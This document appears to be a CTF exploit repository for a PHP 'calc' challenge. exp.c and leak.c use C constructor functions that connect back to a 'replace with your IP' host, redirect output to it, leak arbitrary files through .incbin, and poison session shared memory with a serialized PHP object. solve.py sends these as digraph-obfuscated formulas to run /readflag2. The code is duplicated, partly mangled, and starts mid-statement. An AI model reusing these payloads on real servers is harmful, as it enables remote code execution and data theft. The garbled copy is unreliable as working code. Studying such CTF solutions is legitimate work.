icchy/exp.c

## exp.c
123;
    return 123;
}
extern void *opendir(const char *);
extern void *readdir(void *);
extern void *shmat(int, const void *, int);
typedef struct {
    ino_t d_ino;
    off_t d_off;
    unsigned short d_reclen;
    unsigned char d_type;
    char d_name[256];
} dirent;
struct sockaddr {
    unsigned short int sa_family;
    char sa_data[14];
};
struct in_addr {
    uint32_t s_addr;
};
struct sockaddr_in {
    unsigned short int sin_family;
    unsigned short sin_port;
    struct in_addr sin_addr;
    char sin_zero[8];
};
int sock;
int data_send(char *data, int len) {
    return send(sock, data, len, 0);
}
__attribute__((constructor)) void setup1() {
    int r;
    struct sockaddr_in sa;
    memset(&sa, 0, sizeof(sa));
    sa.sin_family = 2;
    sa.sin_addr.s_addr = 0x0100007f; /* replace with your IP */
    sa.sin_port = 0x901f; /* and port */
    sock = socket(2, 1, 0);
    connect(sock, (struct sockaddr*)&sa, sizeof(sa));
    dup2(sock, 1);
}
__attribute__((constructor)) void f() {
    void *dir = (void*)opendir("/tmp");
    void *de;
    while (1) {
        de = readdir(dir);
        if (de == NULL) break;

        char *s = ((dirent*)de)->d_name;
        if (s[0] == 's' && strlen(s) == 7) {
            char p[256];
            snprintf(p, 255, "/tmp/%s", s);
            int id = shmget(ftok(p, 'a'), 0, 0);
            int i = 0;
            void *data = shmat(id, 0, 0);
            void *var = data+64;
            void *size = var-16;
            char *payload = "__PAYLOAD__";
            if (*((uint64_t*)size) != 26) {
                continue;
            }
            *((uint64_t*)size) = strlen(payload);
            for (i = 0; i < *((uint64_t*)size); i++) {
                ((char*)var)[i] = payload[i];
            }
        }
    }
}
int g(){
    int res = 0

## leak.c
123;
}
__asm__(".section .rodata\n"
        ".global bin_start\n"
        ".type bin_start, @object\n"
        ".balign 16\n"
        "bin_start:\n"
        ".incbin \"__PATH__\"\n"
        ".global bin_end\n"
        ".type bin_end, @object\n"
        ".balign 1\n"
        "bin_end:\n"
        ".byte 0\n"
);
extern const __attribute__((aligned(16))) void *bin_start;
extern const void* bin_end;
struct sockaddr {
    unsigned short int sa_family;
    char sa_data[14];
};
struct in_addr {
    uint32_t s_addr;
};
struct sockaddr_in {
    unsigned short int sin_family;
    unsigned short sin_port;
    struct in_addr sin_addr;
    char sin_zero[8];
};
int sock;
int data_send(char *data, int len) {
    return send(sock, data, len, 0);
}
__attribute__((constructor)) void setup1() {
    int r;
    struct sockaddr_in sa;
    memset(&sa, 0, sizeof(sa));
    sa.sin_family = 2;
    sa.sin_addr.s_addr = 0x0100007f; /* replace with your IP */
    sa.sin_port = 0x901f; /* and port */
    sock = socket(2, 1, 0);
    connect(sock, (struct sockaddr*)&sa, sizeof(sa));
    dup2(sock, 1);
}
__attribute__((constructor)) void f() {
    printf("%s\n", &bin_start);
}
int g(){
    int res = 0

## solve.py
import requests

url = 'http://galileo.local:10080/calc.php'
url = 'http://192.168.121.171:10080/calc.php'
url = 'http://localhost:10080/calc.php'
url = 'http://olc.chal.ctf.westerns.tokyo/calc.php'
# url = 'http://192.168.121.171/calc.php'

def exp():
    payload = open('exp.c', 'rb').read()

    cmd = "/readflag2>/var/tmp/0j29fqj30f"
    obj = 'a:2:{s:9:"__started";i:1;i:2;O:4:"Calc":3:{s:3:"bin";s:%d:"";%s;";s:3:"src";s:6:"abcdef";s:3:"tmp";R:4;}}' % (3 + len(cmd), cmd)

    obj = obj.replace('{', '\\x7b').replace('}', '\\x7d').replace('"', '\\"')
    payload = payload.replace('__PAYLOAD__', obj)
    payload = payload.replace('{', '<%')
    payload = payload.replace('}', '%>')
    payload = payload.replace('#', '%:')
    payload = payload.replace('\n', ' ')

    req = requests.get(url, params={
        'formula': payload
    })

    print(req.content)


def leak(path):
    payload = open('leak.c', 'rb').read().replace('__PATH__', path)
    payload = payload.replace('{', '<%')
    payload = payload.replace('}', '%>')
    payload = payload.replace('#', '%:')
    payload = payload.replace('\n', ' ')

    req = requests.get(url, params={
        'formula': payload
    })

    print(req.content)

leak('./calc.php')
exp()
leak('/var/tmp/0j29fqj30f')
	123;
	return 123;
	}
	extern void opendir(const char );
	extern void readdir(void );
	extern void shmat(int, const void , int);
	typedef struct {
	ino_t d_ino;
	off_t d_off;
	unsigned short d_reclen;
	unsigned char d_type;
	char d_name[256];
	} dirent;
	struct sockaddr {
	unsigned short int sa_family;
	char sa_data[14];
	};
	struct in_addr {
	uint32_t s_addr;
	};
	struct sockaddr_in {
	unsigned short int sin_family;
	unsigned short sin_port;
	struct in_addr sin_addr;
	char sin_zero[8];
	};
	int sock;
	int data_send(char *data, int len) {
	return send(sock, data, len, 0);
	}
	__attribute__((constructor)) void setup1() {
	int r;
	struct sockaddr_in sa;
	memset(&sa, 0, sizeof(sa));
	sa.sin_family = 2;
	sa.sin_addr.s_addr = 0x0100007f; /* replace with your IP */
	sa.sin_port = 0x901f; /* and port */
	sock = socket(2, 1, 0);
	connect(sock, (struct sockaddr*)&sa, sizeof(sa));
	dup2(sock, 1);
	}
	__attribute__((constructor)) void f() {
	void dir = (void)opendir("/tmp");
	void *de;
	while (1) {
	de = readdir(dir);
	if (de == NULL) break;

	char s = ((dirent)de)->d_name;
	if (s[0] == 's' && strlen(s) == 7) {
	char p[256];
	snprintf(p, 255, "/tmp/%s", s);
	int id = shmget(ftok(p, 'a'), 0, 0);
	int i = 0;
	void *data = shmat(id, 0, 0);
	void *var = data+64;
	void *size = var-16;
	char *payload = "__PAYLOAD__";
	if (((uint64_t)size) != 26) {
	continue;
	}
	((uint64_t)size) = strlen(payload);
	for (i = 0; i < ((uint64_t)size); i++) {
	((char*)var)[i] = payload[i];
	}
	}
	}
	}
	int g(){
	int res = 0
	123;
	}
	__asm__(".section .rodata\n"
	".global bin_start\n"
	".type bin_start, @object\n"
	".balign 16\n"
	"bin_start:\n"
	".incbin \"__PATH__\"\n"
	".global bin_end\n"
	".type bin_end, @object\n"
	".balign 1\n"
	"bin_end:\n"
	".byte 0\n"
	);
	extern const __attribute__((aligned(16))) void *bin_start;
	extern const void* bin_end;
	struct sockaddr {
	unsigned short int sa_family;
	char sa_data[14];
	};
	struct in_addr {
	uint32_t s_addr;
	};
	struct sockaddr_in {
	unsigned short int sin_family;
	unsigned short sin_port;
	struct in_addr sin_addr;
	char sin_zero[8];
	};
	int sock;
	int data_send(char *data, int len) {
	return send(sock, data, len, 0);
	}
	__attribute__((constructor)) void setup1() {
	int r;
	struct sockaddr_in sa;
	memset(&sa, 0, sizeof(sa));
	sa.sin_family = 2;
	sa.sin_addr.s_addr = 0x0100007f; /* replace with your IP */
	sa.sin_port = 0x901f; /* and port */
	sock = socket(2, 1, 0);
	connect(sock, (struct sockaddr*)&sa, sizeof(sa));
	dup2(sock, 1);
	}
	__attribute__((constructor)) void f() {
	printf("%s\n", &bin_start);
	}
	int g(){
	int res = 0
	import requests

	url = 'http://galileo.local:10080/calc.php'
	url = 'http://192.168.121.171:10080/calc.php'
	url = 'http://localhost:10080/calc.php'
	url = 'http://olc.chal.ctf.westerns.tokyo/calc.php'
	# url = 'http://192.168.121.171/calc.php'

	def exp():
	payload = open('exp.c', 'rb').read()

	cmd = "/readflag2>/var/tmp/0j29fqj30f"
	obj = 'a:2:{s:9:"__started";i:1;i:2;O:4:"Calc":3:{s:3:"bin";s:%d:"";%s;";s:3:"src";s:6:"abcdef";s:3:"tmp";R:4;}}' % (3 + len(cmd), cmd)

	obj = obj.replace('{', '\\x7b').replace('}', '\\x7d').replace('"', '\\"')
	payload = payload.replace('__PAYLOAD__', obj)
	payload = payload.replace('{', '<%')
	payload = payload.replace('}', '%>')
	payload = payload.replace('#', '%:')
	payload = payload.replace('\n', ' ')

	req = requests.get(url, params={
	'formula': payload
	})

	print(req.content)


	def leak(path):
	payload = open('leak.c', 'rb').read().replace('__PATH__', path)
	payload = payload.replace('{', '<%')
	payload = payload.replace('}', '%>')
	payload = payload.replace('#', '%:')
	payload = payload.replace('\n', ' ')

	req = requests.get(url, params={
	'formula': payload
	})

	print(req.content)

	leak('./calc.php')
	exp()
	leak('/var/tmp/0j29fqj30f')